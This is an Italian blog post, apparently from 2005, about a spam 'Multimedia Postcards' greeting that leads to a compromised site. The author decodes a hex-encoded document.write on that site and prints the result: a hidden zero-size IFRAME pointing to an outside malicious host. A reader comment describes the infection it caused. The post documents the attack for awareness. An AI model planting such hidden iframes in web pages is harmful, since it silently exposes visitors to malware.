e-cartolina virale?

Tra lo spam odierno, mi è arrivato il messaggio che affermava che avevo un “Multimedia Postcards(R) Greeting” per me, con tanto di sito dove andare a scaricare (http://www.bazumcircus.it/img/news2/) e codice ( DP_42a04492060aaa46).
Per curiosità ho provato ad andare direttamente sulla homepage del sito… e Mozilla mi si è chiuso. A questo punto ho fatto quello che dovevo fare subito, vale a dire prendere Lynx: la home page mi dà (anzi mi dava, l’hanno già chiuso) una sfilza di link a siti che offrono medicinali sessuali, e terminava con un document.write scritto in esadecimale, che tradotto dà
<IFRAME SRC=”http://crunet.info/out.php?s_id=1″ WIDTH=0 BORDER=0 HEIGHT=0 style=”display:none”></IFRAME>.
crunet.info è un sito russo – o almeno scritto in russo, e quel php mi rimanda a un non meglio identificato http://195.225.177.33/0305.html; il quale però (senza ammettere cookie, ovvio) non dice molto. Zigh, una ricerchina fatta per nulla… però mi pareva più professionale del solito.
AGGIORNAMENTO:Naturalmente io sono stato così stupido da scrivere io il testo “IFRAME”. Solo che non usando internet explorer, naturalmente non mi capitava nulla, così come non è capitato nulla a chi mi legge con safari, mozilla, netscape … (o via RSS). Adesso che zop mi ha fatto notare la cosa ho scoperto la gabola (adesso la scritta non è più lanciabile, tranquilli!)

Ultimo aggiornamento: 2005-11-13 20:46

2 pensieri su “e-cartolina virale?

  1. Silvy

    è arrivata anche a me… e anch’io come un’allocca sono andata a vedere… ma la pagina non si è caricata. Dimmi che ho preso un virus… CASSUUUUUUUUU

  2. .mau.

    sembra relativamente (si fa per dire…) innocuo. Crea una icona “Internet Explorer” che in realtà è un collegamento a uno dei loro siti, e un processo (che puoi vedere col Task Manager) che si chiama m00.exe e che è da fare fuori.

I commenti sono chiusi.